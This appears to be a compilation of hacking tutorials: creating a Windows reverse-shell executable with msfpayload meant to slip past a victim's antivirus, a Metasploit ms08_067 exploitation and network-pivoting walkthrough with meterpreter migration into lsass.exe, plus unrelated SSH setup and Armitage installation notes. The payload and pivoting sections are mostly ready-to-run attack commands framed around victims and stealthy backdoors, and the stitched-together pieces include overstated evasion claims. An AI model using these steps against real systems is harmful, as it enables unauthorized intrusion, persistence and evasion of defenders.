Payload undetectable For Multi Computer

Step 1: Explore Msfpayload

Let’s start by exploring msfpayload as part of the Metasploit suite. By typing msfpayload with the –h switch, we can get the help screen on this module.

msfpayload -h

Notice in the screenshot above that the syntax for this module includes options, the payload, and then several values that enable us to encode the payload using various programming languages including C, Perl, Ruby, Raw, VBA and others.

Msfpayload enables us to convert the code of the payload into any of these choices and thereby better evade the victim’s AV software.

Step 2: Generate a Custom Payload

Let’s proceed to generate a customized payload in C.

msfpayload windows/shell/reverse_tcp -o

Notice that we used the –o option and Metasploit displays our various options. To generate the the customized payload we need to pass the options to Metasploit, in this case the LHOST and the LPORT. Let’s set those to our machine 192.168.100.1 and the LPORT to 4441.

We need to now generate a custom payload in C by typing:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C

Notice that we appended the command with a capital C to indicate that we wanted the payload to be generated in C. As you can see from screenshot above, Metasploit generated the payload in C and displayed it to us.

Step 3: Generate the Binary Code

Finally, we need to generate a binary executable for the shellcode which can use in our client side attack.

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe

We have now created an executable file by using the X option and then sent this file to the current folder and named the file setup.exe. We can now use this new payload in a client-side attack and the victim’s AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.

And that's it! Stay tuned for my next lesson, where we'll explore ways to disable the client AV software altogether.

How to Install SSH in Ubuntu

Steps

1. First install SSHD (secure shell daemon) and client. Type in the following commands in a terminal session:
   sudo apt-get install openssh-server openssh-client
2. Test your installation by connecting to your own server. Type in the following comand:
   ssh localhost
   or
   ssh your-username@your-server-ip-address
3. Basically you connect to your SSH server by knowing three things: 1) your domain name or ip address, 2) your username, and 3) your password.
4. If you are using another remote Linux terminal to connect to your SSH server you will type the following terminal commands:
   ssh your-username your-server-domain.name-or-ipaddress
   example: ssh dan somedomain.com
   or
   ssh your-username@your-server-domain.name-or-ipaddress
   example: ssh dan@somedomain.com 
5. If you are using a program like PuTTY in Windows to connect to your SSH server you will need to fill in your domain name or ip address and click "Open", after which you will be prompted for your username and password.   
6. The terminal commands to start, stop and restart your sshd server are:
   sudo /etc/init.d/ssh start
   sudo /etc/init.d/ssh stop
   sudo /etc/init.d/ssh restart

Troubleshooting

If you are l having problems connecting to your SSH server from another remote computer it may be a firewall issue. By default SSH makes connections on port 22, so you will have to make sure port 22 is open on your Linux computer, and if you are connecting from another network that port forwarding is enabled on your local router/firewall device on port 22 as well.

Matasploit Attack on Other Network

Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.

Exploit: 

              In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then using pivoting, exploit another host on the network..

Requirements: 

                                   The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running WindowsXP Pro - Service Pack 2..

Exploit steps:

Open a terminal in Backtrack and enter the following commands:

#msfconsole

msf > show exploits

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp

     PAYLOAD => windows/meterpreter/bind_tcp

msf exploit (ms08_067_netapi) > show options

msf exploit (ms08_067_netapi) > set RHOST <1st victim's ip address>

     RHOST => <ip address>

msf exploit (ms08_067_netapi) > exploit        //if you are successful, you will see a meterpreter prompt

meterpreter >                    //if you see this you have a Meterpreter shell

meterpreter > shell           //this will give you a Windows command prompt/shell

C:\WINDOWS\sytem32> exit             //exit out of the Windows command prompt

meterpreter > getpid                 //note the process id that Meterpreter is using

meterpreter > ps              //list all running process on the victim machine. What process does your PID shows up as? svchost.exe? Look for the process "lsass.exe" , it may show up as PID 700

meterpreter > migrate 700           //migrate Meterpreter to the lsass.exe process

meterpreter > getpid                     //verify your new process ID

ctrl+z                             //Key in ctrl+z to background the Meterpreter session

msf > route add <2nd victim's ip address> <subnet mask> <session id #>           //route a new attack to victim 2

msf > use windows/smb/ms08_067_netapi

msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp

msf exploit (ms08_067_netapi) > set RHOST <2nd victim's ip address>

msf exploit (ms08_067_netapi) > exploit

meterpreter >                           //success!!!!

Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:..

     meterpreter > help                     //help menu

     meterpreter > background         //backgrounds the current session

     meterpreter > exit                      //terminate the meterpreter session

     meterpreter > quit                      //terminate the meterpreter session

     meterpreter > write                    //writes data to a channel

     meterpreter > mkdir                  //creates a directory

     meterpreter > download            //download a file or directory

     meterpreter > upload                //upload a file or directory

     meterpreter > search                //search for a file

           

How do I run Armitage on Kali Linux?

How do I run Armitage on Kali Linux?

Armitage is not distributed with Kali Linux. It is in the Kali Linux repository though. To install it, type:

apt-get install armitage

2. I get a database error on Kali Linux. How do I fix it?

Make sure the database is running. Use:

service postgresql start

Next, you may need to ask Kali to recreate the Metasploit framework database:

service metasploit start 
service metasploit stop

Sometimes you need to do the above after an msfupdate as well.

3. Sometimes Armitage's menus stick (or I see graphic glitches)--how do I fix this?

Kali Linux comes with Java 1.6 and 1.7 pre-installed. Unfortunately, it defaults to Java 1.6 which has a few issues. You'll need to tell Kali Linux to use Java 1.7 by default. Here's how:

32-bit Kali Linux:

update-java-alternatives --jre -s java-1.7.0-openjdk-i386

64-bit Kali Linx:

update-java-alternatives --jre -s java-1.7.0-openjdk-amd64